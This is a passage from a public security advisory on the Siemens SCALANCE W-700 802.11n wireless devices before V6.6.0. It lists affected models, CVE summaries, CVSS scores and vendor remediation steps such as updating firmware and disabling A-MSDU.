View CSAF Summary SCALANCE W-700 IEEE 802.11n family before V6.6.0 are affected by multiple vulnerabilities. Siemens has released a new version for SCALANCE W-700 IEEE 802.11n family and recommends to update to the latest version. The following versions of Siemens SCALANCE are affected: SCALANCE W721-1 RJ45 (6GK5721-1FC00-0AA0) vers:intdot/<6.6.0 (CVE-2020-24588, CVE-2020-26139, CVE-2020-26140, CVE-2020-26141, CVE-2020-26143, CVE-2020-26144, CVE-2020-26146, CVE-2020-26147, CVE-2021-3712, CVE-2022-0778, CVE-2022-31765, CVE-2022-36323, CVE-2022-36324, CVE-2022-36325, CVE-2023-44373) SCALANCE W721-1 RJ45 (6GK5721-1FC00-0AB0) vers:intdot/<6.6.0 (CVE-2020-24588, CVE-2020-26139, CVE-2020-26140, CVE-2020-26141, CVE-2020-26143, CVE-2020-26144, CVE-2020-26146, CVE-2020-26147, CVE-2021-3712, CVE-2022-0778, CVE-2022-31765, CVE-2022-36323, CVE-2022-36324, CVE-2022-36325, CVE-2023-44373) SCALANCE W722-1 RJ45 (6GK5722-1FC00-0AA0) vers:intdot/<6.6.0 (CVE-2020-24588, CVE-2020-26139, CVE-2020-26140, CVE-2020-26141, CVE-2020-26143, CVE-2020-26144, CVE-2020-26146, CVE-2020-26147, CVE-2021-3712, CVE-2022-0778, CVE-2022-31765, CVE-2022-36323, CVE-2022-36324, CVE-2022-36325, CVE-2023-44373) SCALANCE W722-1 RJ45 (6GK5722-1FC00-0AB0) vers:intdot/<6.6.0 (CVE-2020-24588, CVE-2020-26139, CVE-2020-26140, CVE-2020-26141, CVE-2020-26143, CVE-2020-26144, CVE-2020-26146, CVE-2020-26147, CVE-2021-3712, CVE-2022-0778, CVE-2022-31765, CVE-2022-36323, CVE-2022-36324, CVE-2022-36325, CVE-2023-44373) SCALANCE W722-1 RJ45 (6GK5722-1FC00-0AC0) vers:intdot/<6.6.0 (CVE-2020-24588, CVE-2020-26139, CVE-2020-26140, CVE-2020-26141, CVE-2020-26143, CVE-2020-26144, CVE-2020-26146, CVE-2020-26147, CVE-2021-3712, CVE-2022-0778, CVE-2022-31765, CVE-2022-36323, CVE-2022-36324, CVE-2022-36325, CVE-2023-44373) SCALANCE W734-1 RJ45 (6GK5734-1FX00-0AA0) vers:intdot/<6.6.0 (CVE-2020-24588, CVE-2020-26139, CVE-2020-26140, CVE-2020-26141, CVE-2020-26143, CVE-2020-26144, CVE-2020-26146, CVE-2020-26147, CVE-2021-3712, CVE-2022-0778, CVE-2022-31765, CVE-2022-36323, CVE-2022-36324, CVE-2022-36325, CVE-2023-44373) SCALANCE W734-1 RJ45 (6GK5734-1FX00-0AA6) vers:intdot/<6.6.0 (CVE-2020-24588, CVE-2020-26139, CVE-2020-26140, CVE-2020-26141, CVE-2020-26143, CVE-2020-26144, CVE-2020-26146, CVE-2020-26147, CVE-2021-3712, CVE-2022-0778, CVE-2022-31765, CVE-2022-36323, CVE-2022-36324, CVE-2022-36325, CVE-2023-44373) SCALANCE W734-1 RJ45 (6GK5734-1FX00-0AB0) vers:intdot/<6.6.0 (CVE-2020-24588, CVE-2020-26139, CVE-2020-26140, CVE-2020-26141, CVE-2020-26143, CVE-2020-26144, CVE-2020-26146, CVE-2020-26147, CVE-2021-3712, CVE-2022-0778, CVE-2022-31765, CVE-2022-36323, CVE-2022-36324, CVE-2022-36325, CVE-2023-44373) SCALANCE W734-1 RJ45 (USA) (6GK5734-1FX00-0AB6) vers:intdot/<6.6.0 (CVE-2020-24588, CVE-2020-26139, CVE-2020-26140, CVE-2020-26141, CVE-2020-26143, CVE-2020-26144, CVE-2020-26146, CVE-2020-26147, CVE-2021-3712, CVE-2022-0778, CVE-2022-31765, CVE-2022-36323, CVE-2022-36324, CVE-2022-36325, CVE-2023-44373) SCALANCE W738-1 M12 (6GK5738-1GY00-0AA0) vers:intdot/<6.6.0 (CVE-2020-24588, CVE-2020-26139, CVE-2020-26140, CVE-2020-26141, CVE-2020-26143, CVE-2020-26144, CVE-2020-26146, CVE-2020-26147, CVE-2021-3712, CVE-2022-0778, CVE-2022-31765, CVE-2022-36323, CVE-2022-36324, CVE-2022-36325, CVE-2023-44373) SCALANCE W738-1 M12 (6GK5738-1GY00-0AB0) vers:intdot/<6.6.0 (CVE-2020-24588, CVE-2020-26139, CVE-2020-26140, CVE-2020-26141, CVE-2020-26143, CVE-2020-26144, CVE-2020-26146, CVE-2020-26147, CVE-2021-3712, CVE-2022-0778, CVE-2022-31765, CVE-2022-36323, CVE-2022-36324, CVE-2022-36325, CVE-2023-44373) SCALANCE W748-1 M12 (6GK5748-1GD00-0AA0) vers:intdot/<6.6.0 (CVE-2020-24588, CVE-2020-26139, CVE-2020-26140, CVE-2020-26141, CVE-2020-26143, CVE-2020-26144, CVE-2020-26146, CVE-2020-26147, CVE-2021-3712, CVE-2022-0778, CVE-2022-31765, CVE-2022-36323, CVE-2022-36324, CVE-2022-36325, CVE-2023-44373) SCALANCE W748-1 M12 (6GK5748-1GD00-0AB0) vers:intdot/<6.6.0 (CVE-2020-24588, CVE-2020-26139, CVE-2020-26140, CVE-2020-26141, CVE-2020-26143, CVE-2020-26144, CVE-2020-26146, CVE-2020-26147, CVE-2021-3712, CVE-2022-0778, CVE-2022-31765, CVE-2022-36323, CVE-2022-36324, CVE-2022-36325, CVE-2023-44373) SCALANCE W748-1 RJ45 (6GK5748-1FC00-0AA0) vers:intdot/<6.6.0 (CVE-2020-24588, CVE-2020-26139, CVE-2020-26140, CVE-2020-26141, CVE-2020-26143, CVE-2020-26144, CVE-2020-26146, CVE-2020-26147, CVE-2021-3712, CVE-2022-0778, CVE-2022-31765, CVE-2022-36323, CVE-2022-36324, CVE-2022-36325, CVE-2023-44373) SCALANCE W748-1 RJ45 (6GK5748-1FC00-0AB0) vers:intdot/<6.6.0 (CVE-2020-24588, CVE-2020-26139, CVE-2020-26140, CVE-2020-26141, CVE-2020-26143, CVE-2020-26144, CVE-2020-26146, CVE-2020-26147, CVE-2021-3712, CVE-2022-0778, CVE-2022-31765, CVE-2022-36323, CVE-2022-36324, CVE-2022-36325, CVE-2023-44373) SCALANCE W761-1 RJ45 (6GK5761-1FC00-0AA0) vers:intdot/<6.6.0 (CVE-2020-24588, CVE-2020-26139, CVE-2020-26140, CVE-2020-26141, CVE-2020-26143, CVE-2020-26144, CVE-2020-26146, CVE-2020-26147, CVE-2021-3712, CVE-2022-0778, CVE-2022-31765, CVE-2022-36323, CVE-2022-36324, CVE-2022-36325, CVE-2023-44373) SCALANCE W761-1 RJ45 (6GK5761-1FC00-0AB0) vers:intdot/<6.6.0 (CVE-2020-24588, CVE-2020-26139, CVE-2020-26140, CVE-2020-26141, CVE-2020-26143, CVE-2020-26144, CVE-2020-26146, CVE-2020-26147, CVE-2021-3712, CVE-2022-0778, CVE-2022-31765, CVE-2022-36323, CVE-2022-36324, CVE-2022-36325, CVE-2023-44373) SCALANCE W774-1 M12 EEC (6GK5774-1FY00-0TA0) vers:intdot/<6.6.0 (CVE-2020-24588, CVE-2020-26139, CVE-2020-26140, CVE-2020-26141, CVE-2020-26143, CVE-2020-26144, CVE-2020-26146, CVE-2020-26147, CVE-2021-3712, CVE-2022-0778, CVE-2022-31765, CVE-2022-36323, CVE-2022-36324, CVE-2022-36325, CVE-2023-44373) SCALANCE W774-1 M12 EEC (6GK5774-1FY00-0TB0) vers:intdot/<6.6.0 (CVE-2020-24588, CVE-2020-26139, CVE-2020-26140, CVE-2020-26141, CVE-2020-26143, CVE-2020-26144, CVE-2020-26146, CVE-2020-26147, CVE-2021-3712, CVE-2022-0778, CVE-2022-31765, CVE-2022-36323, CVE-2022-36324, CVE-2022-36325, CVE-2023-44373) SCALANCE W774-1 RJ45 (6GK5774-1FX00-0AA0) vers:intdot/<6.6.0 (CVE-2020-24588, CVE-2020-26139, CVE-2020-26140, CVE-2020-26141, CVE-2020-26143, CVE-2020-26144, CVE-2020-26146, CVE-2020-26147, CVE-2021-3712, CVE-2022-0778, CVE-2022-31765, CVE-2022-36323, CVE-2022-36324, CVE-2022-36325, CVE-2023-44373) SCALANCE W774-1 RJ45 (6GK5774-1FX00-0AA6) vers:intdot/<6.6.0 (CVE-2020-24588, CVE-2020-26139, CVE-2020-26140, CVE-2020-26141, CVE-2020-26143, CVE-2020-26144, CVE-2020-26146, CVE-2020-26147, CVE-2021-3712, CVE-2022-0778, CVE-2022-31765, CVE-2022-36323, CVE-2022-36324, CVE-2022-36325, CVE-2023-44373) SCALANCE W774-1 RJ45 (6GK5774-1FX00-0AB0) vers:intdot/<6.6.0 (CVE-2020-24588, CVE-2020-26139, CVE-2020-26140, CVE-2020-26141, CVE-2020-26143, CVE-2020-26144, CVE-2020-26146, CVE-2020-26147, CVE-2021-3712, CVE-2022-0778, CVE-2022-31765, CVE-2022-36323, CVE-2022-36324, CVE-2022-36325, CVE-2023-44373) SCALANCE W774-1 RJ45 (6GK5774-1FX00-0AC0) vers:intdot/<6.6.0 (CVE-2020-24588, CVE-2020-26139, CVE-2020-26140, CVE-2020-26141, CVE-2020-26143, CVE-2020-26144, CVE-2020-26146, CVE-2020-26147, CVE-2021-3712, CVE-2022-0778, CVE-2022-31765, CVE-2022-36323, CVE-2022-36324, CVE-2022-36325, CVE-2023-44373) SCALANCE W774-1 RJ45 (USA) (6GK5774-1FX00-0AB6) vers:intdot/<6.6.0 (CVE-2020-24588, CVE-2020-26139, CVE-2020-26140, CVE-2020-26141, CVE-2020-26143, CVE-2020-26144, CVE-2020-26146, CVE-2020-26147, CVE-2021-3712, CVE-2022-0778, CVE-2022-31765, CVE-2022-36323, CVE-2022-36324, CVE-2022-36325, CVE-2023-44373) SCALANCE W778-1 M12 (6GK5778-1GY00-0AA0) vers:intdot/<6.6.0 (CVE-2020-24588, CVE-2020-26139, CVE-2020-26140, CVE-2020-26141, CVE-2020-26143, CVE-2020-26144, CVE-2020-26146, CVE-2020-26147, CVE-2021-3712, CVE-2022-0778, CVE-2022-31765, CVE-2022-36323, CVE-2022-36324, CVE-2022-36325, CVE-2023-44373) SCALANCE W778-1 M12 (6GK5778-1GY00-0AB0) vers:intdot/<6.6.0 (CVE-2020-24588, CVE-2020-26139, CVE-2020-26140, CVE-2020-26141, CVE-2020-26143, CVE-2020-26144, CVE-2020-26146, CVE-2020-26147, CVE-2021-3712, CVE-2022-0778, CVE-2022-31765, CVE-2022-36323, CVE-2022-36324, CVE-2022-36325, CVE-2023-44373) SCALANCE W778-1 M12 EEC (6GK5778-1GY00-0TA0) vers:intdot/<6.6.0 (CVE-2020-24588, CVE-2020-26139, CVE-2020-26140, CVE-2020-26141, CVE-2020-26143, CVE-2020-26144, CVE-2020-26146, CVE-2020-26147, CVE-2021-3712, CVE-2022-0778, CVE-2022-31765, CVE-2022-36323, CVE-2022-36324, CVE-2022-36325, CVE-2023-44373) SCALANCE W778-1 M12 EEC (USA) (6GK5778-1GY00-0TB0) vers:intdot/<6.6.0 (CVE-2020-24588, CVE-2020-26139, CVE-2020-26140, CVE-2020-26141, CVE-2020-26143, CVE-2020-26144, CVE-2020-26146, CVE-2020-26147, CVE-2021-3712, CVE-2022-0778, CVE-2022-31765, CVE-2022-36323, CVE-2022-36324, CVE-2022-36325, CVE-2023-44373) SCALANCE W786-1 RJ45 (6GK5786-1FC00-0AA0) vers:intdot/<6.6.0 (CVE-2020-24588, CVE-2020-26139, CVE-2020-26140, CVE-2020-26141, CVE-2020-26143, CVE-2020-26144, CVE-2020-26146, CVE-2020-26147, CVE-2021-3712, CVE-2022-0778, CVE-2022-31765, CVE-2022-36323, CVE-2022-36324, CVE-2022-36325, CVE-2023-44373) SCALANCE W786-1 RJ45 (6GK5786-1FC00-0AB0) vers:intdot/<6.6.0 (CVE-2020-24588, CVE-2020-26139, CVE-2020-26140, CVE-2020-26141, CVE-2020-26143, CVE-2020-26144, CVE-2020-26146, CVE-2020-26147, CVE-2021-3712, CVE-2022-0778, CVE-2022-31765, CVE-2022-36323, CVE-2022-36324, CVE-2022-36325, CVE-2023-44373) SCALANCE W786-2 RJ45 (6GK5786-2FC00-0AA0) vers:intdot/<6.6.0 (CVE-2020-24588, CVE-2020-26139, CVE-2020-26140, CVE-2020-26141, CVE-2020-26143, CVE-2020-26144, CVE-2020-26146, CVE-2020-26147, CVE-2021-3712, CVE-2022-0778, CVE-2022-31765, CVE-2022-36323, CVE-2022-36324, CVE-2022-36325, CVE-2023-44373) SCALANCE W786-2 RJ45 (6GK5786-2FC00-0AB0) vers:intdot/<6.6.0 (CVE-2020-24588, CVE-2020-26139, CVE-2020-26140, CVE-2020-26141, CVE-2020-26143, CVE-2020-26144, CVE-2020-26146, CVE-2020-26147, CVE-2021-3712, CVE-2022-0778, CVE-2022-31765, CVE-2022-36323, CVE-2022-36324, CVE-2022-36325, CVE-2023-44373) SCALANCE W786-2 RJ45 (6GK5786-2FC00-0AC0) vers:intdot/<6.6.0 (CVE-2020-24588, CVE-2020-26139, CVE-2020-26140, CVE-2020-26141, CVE-2020-26143, CVE-2020-26144, CVE-2020-26146, CVE-2020-26147, CVE-2021-3712, CVE-2022-0778, CVE-2022-31765, CVE-2022-36323, CVE-2022-36324, CVE-2022-36325, CVE-2023-44373) SCALANCE W786-2 SFP (6GK5786-2FE00-0AA0) vers:intdot/<6.6.0 (CVE-2020-24588, CVE-2020-26139, CVE-2020-26140, CVE-2020-26141, CVE-2020-26143, CVE-2020-26144, CVE-2020-26146, CVE-2020-26147, CVE-2021-3712, CVE-2022-0778, CVE-2022-31765, CVE-2022-36323, CVE-2022-36324, CVE-2022-36325, CVE-2023-44373) SCALANCE W786-2 SFP (6GK5786-2FE00-0AB0) vers:intdot/<6.6.0 (CVE-2020-24588, CVE-2020-26139, CVE-2020-26140, CVE-2020-26141, CVE-2020-26143, CVE-2020-26144, CVE-2020-26146, CVE-2020-26147, CVE-2021-3712, CVE-2022-0778, CVE-2022-31765, CVE-2022-36323, CVE-2022-36324, CVE-2022-36325, CVE-2023-44373) SCALANCE W786-2IA RJ45 (6GK5786-2HC00-0AA0) vers:intdot/<6.6.0 (CVE-2020-24588, CVE-2020-26139, CVE-2020-26140, CVE-2020-26141, CVE-2020-26143, CVE-2020-26144, CVE-2020-26146, CVE-2020-26147, CVE-2021-3712, CVE-2022-0778, CVE-2022-31765, CVE-2022-36323, CVE-2022-36324, CVE-2022-36325, CVE-2023-44373) SCALANCE W786-2IA RJ45 (6GK5786-2HC00-0AB0) vers:intdot/<6.6.0 (CVE-2020-24588, CVE-2020-26139, CVE-2020-26140, CVE-2020-26141, CVE-2020-26143, CVE-2020-26144, CVE-2020-26146, CVE-2020-26147, CVE-2021-3712, CVE-2022-0778, CVE-2022-31765, CVE-2022-36323, CVE-2022-36324, CVE-2022-36325, CVE-2023-44373) SCALANCE W788-1 M12 (6GK5788-1GD00-0AA0) vers:intdot/<6.6.0 (CVE-2020-24588, CVE-2020-26139, CVE-2020-26140, CVE-2020-26141, CVE-2020-26143, CVE-2020-26144, CVE-2020-26146, CVE-2020-26147, CVE-2021-3712, CVE-2022-0778, CVE-2022-31765, CVE-2022-36323, CVE-2022-36324, CVE-2022-36325, CVE-2023-44373) SCALANCE W788-1 M12 (6GK5788-1GD00-0AB0) vers:intdot/<6.6.0 (CVE-2020-24588, CVE-2020-26139, CVE-2020-26140, CVE-2020-26141, CVE-2020-26143, CVE-2020-26144, CVE-2020-26146, CVE-2020-26147, CVE-2021-3712, CVE-2022-0778, CVE-2022-31765, CVE-2022-36323, CVE-2022-36324, CVE-2022-36325, CVE-2023-44373) SCALANCE W788-1 RJ45 (6GK5788-1FC00-0AA0) vers:intdot/<6.6.0 (CVE-2020-24588, CVE-2020-26139, CVE-2020-26140, CVE-2020-26141, CVE-2020-26143, CVE-2020-26144, CVE-2020-26146, CVE-2020-26147, CVE-2021-3712, CVE-2022-0778, CVE-2022-31765, CVE-2022-36323, CVE-2022-36324, CVE-2022-36325, CVE-2023-44373) SCALANCE W788-1 RJ45 (6GK5788-1FC00-0AB0) vers:intdot/<6.6.0 (CVE-2020-24588, CVE-2020-26139, CVE-2020-26140, CVE-2020-26141, CVE-2020-26143, CVE-2020-26144, CVE-2020-26146, CVE-2020-26147, CVE-2021-3712, CVE-2022-0778, CVE-2022-31765, CVE-2022-36323, CVE-2022-36324, CVE-2022-36325, CVE-2023-44373) SCALANCE W788-2 M12 (6GK5788-2GD00-0AA0) vers:intdot/<6.6.0 (CVE-2020-24588, CVE-2020-26139, CVE-2020-26140, CVE-2020-26141, CVE-2020-26143, CVE-2020-26144, CVE-2020-26146, CVE-2020-26147, CVE-2021-3712, CVE-2022-0778, CVE-2022-31765, CVE-2022-36323, CVE-2022-36324, CVE-2022-36325, CVE-2023-44373) SCALANCE W788-2 M12 (6GK5788-2GD00-0AB0) vers:intdot/<6.6.0 (CVE-2020-24588, CVE-2020-26139, CVE-2020-26140, CVE-2020-26141, CVE-2020-26143, CVE-2020-26144, CVE-2020-26146, CVE-2020-26147, CVE-2021-3712, CVE-2022-0778, CVE-2022-31765, CVE-2022-36323, CVE-2022-36324, CVE-2022-36325, CVE-2023-44373) SCALANCE W788-2 M12 EEC (6GK5788-2GD00-0TA0) vers:intdot/<6.6.0 (CVE-2020-24588, CVE-2020-26139, CVE-2020-26140, CVE-2020-26141, CVE-2020-26143, CVE-2020-26144, CVE-2020-26146, CVE-2020-26147, CVE-2021-3712, CVE-2022-0778, CVE-2022-31765, CVE-2022-36323, CVE-2022-36324, CVE-2022-36325, CVE-2023-44373) SCALANCE W788-2 M12 EEC (6GK5788-2GD00-0TB0) vers:intdot/<6.6.0 (CVE-2020-24588, CVE-2020-26139, CVE-2020-26140, CVE-2020-26141, CVE-2020-26143, CVE-2020-26144, CVE-2020-26146, CVE-2020-26147, CVE-2021-3712, CVE-2022-0778, CVE-2022-31765, CVE-2022-36323, CVE-2022-36324, CVE-2022-36325, CVE-2023-44373) SCALANCE W788-2 M12 EEC (6GK5788-2GD00-0TC0) vers:intdot/<6.6.0 (CVE-2020-24588, CVE-2020-26139, CVE-2020-26140, CVE-2020-26141, CVE-2020-26143, CVE-2020-26144, CVE-2020-26146, CVE-2020-26147, CVE-2021-3712, CVE-2022-0778, CVE-2022-31765, CVE-2022-36323, CVE-2022-36324, CVE-2022-36325, CVE-2023-44373) SCALANCE W788-2 RJ45 (6GK5788-2FC00-0AA0) vers:intdot/<6.6.0 (CVE-2020-24588, CVE-2020-26139, CVE-2020-26140, CVE-2020-26141, CVE-2020-26143, CVE-2020-26144, CVE-2020-26146, CVE-2020-26147, CVE-2021-3712, CVE-2022-0778, CVE-2022-31765, CVE-2022-36323, CVE-2022-36324, CVE-2022-36325, CVE-2023-44373) SCALANCE W788-2 RJ45 (6GK5788-2FC00-0AB0) vers:intdot/<6.6.0 (CVE-2020-24588, CVE-2020-26139, CVE-2020-26140, CVE-2020-26141, CVE-2020-26143, CVE-2020-26144, CVE-2020-26146, CVE-2020-26147, CVE-2021-3712, CVE-2022-0778, CVE-2022-31765, CVE-2022-36323, CVE-2022-36324, CVE-2022-36325, CVE-2023-44373) SCALANCE W788-2 RJ45 (6GK5788-2FC00-0AC0) vers:intdot/<6.6.0 (CVE-2020-24588, CVE-2020-26139, CVE-2020-26140, CVE-2020-26141, CVE-2020-26143, CVE-2020-26144, CVE-2020-26146, CVE-2020-26147, CVE-2021-3712, CVE-2022-0778, CVE-2022-31765, CVE-2022-36323, CVE-2022-36324, CVE-2022-36325, CVE-2023-44373) CVSS Vendor Equipment Vulnerabilities v3 9.1 Siemens Siemens SCALANCE Missing Authentication for Critical Function, Improper Authentication, Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection'), Improper Validation of Integrity Check Value, Improper Input Validation, Out-of-bounds Read, Loop with Unreachable Exit Condition ('Infinite Loop'), Missing Authorization, Allocation of Resources Without Limits or Throttling, Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS) Background Critical Infrastructure Sectors: Communications, Information Technology, Critical Manufacturing Countries/Areas Deployed: Worldwide Company Headquarters Location: Germany Vulnerabilities Expand All + CVE-2020-24588 The 802.11 standard that underpins Wi-Fi Protected Access (WPA, WPA2, and WPA3) and Wired Equivalent Privacy (WEP) doesn't require that the A-MSDU flag in the plaintext QoS header field is authenticated. Against devices that support receiving non-SSP A-MSDU frames (which is mandatory as part of 802.11n), an adversary can abuse this to inject arbitrary network packets. View CVE Details Affected Products Siemens SCALANCE Vendor: Siemens Product Version: SCALANCE W721-1 RJ45 (6GK5721-1FC00-0AA0), SCALANCE W721-1 RJ45 (6GK5721-1FC00-0AB0), SCALANCE W722-1 RJ45 (6GK5722-1FC00-0AA0), SCALANCE W722-1 RJ45 (6GK5722-1FC00-0AB0), SCALANCE W722-1 RJ45 (6GK5722-1FC00-0AC0), SCALANCE W734-1 RJ45 (6GK5734-1FX00-0AA0), SCALANCE W734-1 RJ45 (6GK5734-1FX00-0AA6), SCALANCE W734-1 RJ45 (6GK5734-1FX00-0AB0), SCALANCE W734-1 RJ45 (USA) (6GK5734-1FX00-0AB6), SCALANCE W738-1 M12 (6GK5738-1GY00-0AA0), SCALANCE W738-1 M12 (6GK5738-1GY00-0AB0), SCALANCE W748-1 M12 (6GK5748-1GD00-0AA0), SCALANCE W748-1 M12 (6GK5748-1GD00-0AB0), SCALANCE W748-1 RJ45 (6GK5748-1FC00-0AA0), SCALANCE W748-1 RJ45 (6GK5748-1FC00-0AB0), SCALANCE W761-1 RJ45 (6GK5761-1FC00-0AA0), SCALANCE W761-1 RJ45 (6GK5761-1FC00-0AB0), SCALANCE W774-1 M12 EEC (6GK5774-1FY00-0TA0), SCALANCE W774-1 M12 EEC (6GK5774-1FY00-0TB0), SCALANCE W774-1 RJ45 (6GK5774-1FX00-0AA0), SCALANCE W774-1 RJ45 (6GK5774-1FX00-0AA6), SCALANCE W774-1 RJ45 (6GK5774-1FX00-0AB0), SCALANCE W774-1 RJ45 (6GK5774-1FX00-0AC0), SCALANCE W774-1 RJ45 (USA) (6GK5774-1FX00-0AB6), SCALANCE W778-1 M12 (6GK5778-1GY00-0AA0), SCALANCE W778-1 M12 (6GK5778-1GY00-0AB0), SCALANCE W778-1 M12 EEC (6GK5778-1GY00-0TA0), SCALANCE W778-1 M12 EEC (USA) (6GK5778-1GY00-0TB0), SCALANCE W786-1 RJ45 (6GK5786-1FC00-0AA0), SCALANCE W786-1 RJ45 (6GK5786-1FC00-0AB0), SCALANCE W786-2 RJ45 (6GK5786-2FC00-0AA0), SCALANCE W786-2 RJ45 (6GK5786-2FC00-0AB0), SCALANCE W786-2 RJ45 (6GK5786-2FC00-0AC0), SCALANCE W786-2 SFP (6GK5786-2FE00-0AA0), SCALANCE W786-2 SFP (6GK5786-2FE00-0AB0), SCALANCE W786-2IA RJ45 (6GK5786-2HC00-0AA0), SCALANCE W786-2IA RJ45 (6GK5786-2HC00-0AB0), SCALANCE W788-1 M12 (6GK5788-1GD00-0AA0), SCALANCE W788-1 M12 (6GK5788-1GD00-0AB0), SCALANCE W788-1 RJ45 (6GK5788-1FC00-0AA0), SCALANCE W788-1 RJ45 (6GK5788-1FC00-0AB0), SCALANCE W788-2 M12 (6GK5788-2GD00-0AA0), SCALANCE W788-2 M12 (6GK5788-2GD00-0AB0), SCALANCE W788-2 M12 EEC (6GK5788-2GD00-0TA0), SCALANCE W788-2 M12 EEC (6GK5788-2GD00-0TB0), SCALANCE W788-2 M12 EEC (6GK5788-2GD00-0TC0), SCALANCE W788-2 RJ45 (6GK5788-2FC00-0AA0), SCALANCE W788-2 RJ45 (6GK5788-2FC00-0AB0), SCALANCE W788-2 RJ45 (6GK5788-2FC00-0AC0) Product Status: known_affected Remediations Mitigation As these vulnerabilities can only be exploited within Wi-Fi range, when possible reduce Wi-Fi transmission power or make sure to have the devices in private areas with physical access controls Mitigation Disable A-MSDU, if possible Vendor fix Update to V6.6.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109996102/ Relevant CWE: CWE-306 Missing Authentication for Critical Function Metrics CVSS Version Base Score Base Severity Vector String 3.1 3.5 LOW CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N CVE-2020-26139 An issue was discovered in the kernel in NetBSD 7.1. An Access Point (AP) forwards EAPOL frames to other clients even though the sender has not yet successfully authenticated to the AP. This might be abused in projected Wi-Fi networks to launch denial-of-service attacks against connected clients and makes it easier to exploit other vulnerabilities in connected clients. View CVE Details Affected Products Siemens SCALANCE Vendor: Siemens Product Version: SCALANCE W721-1 RJ45 (6GK5721-1FC00-0AA0), SCALANCE W721-1 RJ45 (6GK5721-1FC00-0AB0), SCALANCE W722-1 RJ45 (6GK5722-1FC00-0AA0), SCALANCE W722-1 RJ45 (6GK5722-1FC00-0AB0), SCALANCE W722-1 RJ45 (6GK5722-1FC00-0AC0), SCALANCE W734-1 RJ45 (6GK5734-1FX00-0AA0), SCALANCE W734-1 RJ45 (6GK5734-1FX00-0AA6), SCALANCE W734-1 RJ45 (6GK5734-1FX00-0AB0), SCALANCE W734-1 RJ45 (USA) (6GK5734-1FX00-0AB6), SCALANCE W738-1 M12 (6GK5738-1GY00-0AA0), SCALANCE W738-1 M12 (6GK5738-1GY00-0AB0), SCALANCE W748-1 M12 (6GK5748-1GD00-0AA0), SCALANCE W748-1 M12 (6GK5748-1GD00-0AB0), SCALANCE W748-1 RJ45 (6GK5748-1FC00-0AA0), SCALANCE W748-1 RJ45 (6GK5748-1FC00-0AB0), SCALANCE W761-1 RJ45 (6GK5761-1FC00-0AA0), SCALANCE W761-1 RJ45 (6GK5761-1FC00-0AB0), SCALANCE W774-1 M12 EEC (6GK5774-1FY00-0TA0), SCALANCE W774-1 M12 EEC (6GK5774-1FY00-0TB0), SCALANCE W774-1 RJ45 (6GK5774-1FX00-0AA0), SCALANCE W774-1 RJ45 (6GK5774-1FX00-0AA6), SCALANCE W774-1 RJ45 (6GK5774-1FX00-0AB0), SCALANCE W774-1 RJ45 (6GK5774-1FX00-0AC0), SCALANCE W774-1 RJ45 (USA) (6GK5774-1FX00-0AB6), SCALANCE W778-1 M12 (6GK5778-1GY00-0AA0), SCALANCE W778-1 M12 (6GK5778-1GY00-0AB0), SCALANCE W778-1 M12 EEC (6GK5778-1GY00-0TA0), SCALANCE W778-1 M12 EEC (USA) (6GK5778-1GY00-0TB0), SCALANCE W786-1 RJ45 (6GK5786-1FC00-0AA0), SCALANCE W786-1 RJ45 (6GK5786-1FC00-0AB0), SCALANCE W786-2 RJ45 (6GK5786-2FC00-0AA0), SCALANCE W786-2 RJ45 (6GK5786-2FC00-0AB0), SCALANCE W786-2 RJ45 (6GK5786-2FC00-0AC0), SCALANCE W786-2 SFP (6GK5786-2FE00-0AA0), SCALANCE W786-2 SFP (6GK5786-2FE00-0AB0), SCALANCE W786-2IA RJ45 (6GK5786-2HC00-0AA0), SCALANCE W786-2IA RJ45 (6GK5786-2HC00-0AB0), SCALANCE W788-1 M12 (6GK5788-1GD00-0AA0), SCALANCE W788-1 M12 (6GK5788-1GD00-0AB0), SCALANCE W788-1 RJ45 (6GK5788-1FC00-0AA0), SCALANCE W788-1 RJ45 (6GK5788-1FC00-0AB0), SCALANCE W788-2 M12 (6GK5788-2GD00-0AA0), SCALANCE W788-2 M12 (6GK5788-2GD00-0AB0), SCALANCE W788-2 M12 EEC (6GK5788-2GD00-0TA0), SCALANCE W788-2 M12 EEC (6GK5788-2GD00-0TB0), SCALANCE W788-2 M12 EEC (6GK5788-2GD00-0TC0), SCALANCE W788-2 RJ45 (6GK5788-2FC00-0AA0), SCALANCE W788-2 RJ45 (6GK5788-2FC00-0AB0), SCALANCE W788-2 RJ45 (6GK5788-2FC00-0AC0) Product Status: known_affected Remediations Mitigation As these vulnerabilities can only be exploited within Wi-Fi range, when possible reduce Wi-Fi transmission power or make sure to have the devices in private areas with physical access controls Vendor fix Update to V6.6.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109996102/ Relevant CWE: CWE-287 Improper Authentication Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.3 MEDIUM CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H CVE-2020-26140 An issue was discovered in the ALFA Windows 10 driver 6.1316.1209 for AWUS036H. The WEP, WPA, WPA2, and WPA3 implementations accept plaintext frames in a protected Wi-Fi network. An adversary can abuse this to inject arbitrary data frames independent of the network configuration. View CVE Details Affected Products Siemens SCALANCE Vendor: Siemens Product Version: SCALANCE W721-1 RJ45 (6GK5721-1FC00-0AA0), SCALANCE W721-1 RJ45 (6GK5721-1FC00-0AB0), SCALANCE W722-1 RJ45 (6GK5722-1FC00-0AA0), SCALANCE W722-1 RJ45 (6GK5722-1FC00-0AB0), SCALANCE W722-1 RJ45 (6GK5722-1FC00-0AC0), SCALANCE W734-1 RJ45 (6GK5734-1FX00-0AA0), SCALANCE W734-1 RJ45 (6GK5734-1FX00-0AA6), SCALANCE W734-1 RJ45 (6GK5734-1FX00-0AB0), SCALANCE W734-1 RJ45 (USA) (6GK5734-1FX00-0AB6), SCALANCE W738-1 M12 (6GK5738-1GY00-0AA0), SCALANCE W738-1 M12 (6GK5738-1GY00-0AB0), SCALANCE W748-1 M12 (6GK5748-1GD00-0AA0), SCALANCE W748-1 M12 (6GK5748-1GD00-0AB0), SCALANCE W748-1 RJ45 (6GK5748-1FC00-0AA0), SCALANCE W748-1 RJ45 (6GK5748-1FC00-0AB0), SCALANCE W761-1 RJ45 (6GK5761-1FC00-0AA0), SCALANCE W761-1 RJ45 (6GK5761-1FC00-0AB0), SCALANCE W774-1 M12 EEC (6GK5774-1FY00-0TA0), SCALANCE W774-1 M12 EEC (6GK5774-1FY00-0TB0), SCALANCE W774-1 RJ45 (6GK5774-1FX00-0AA0), 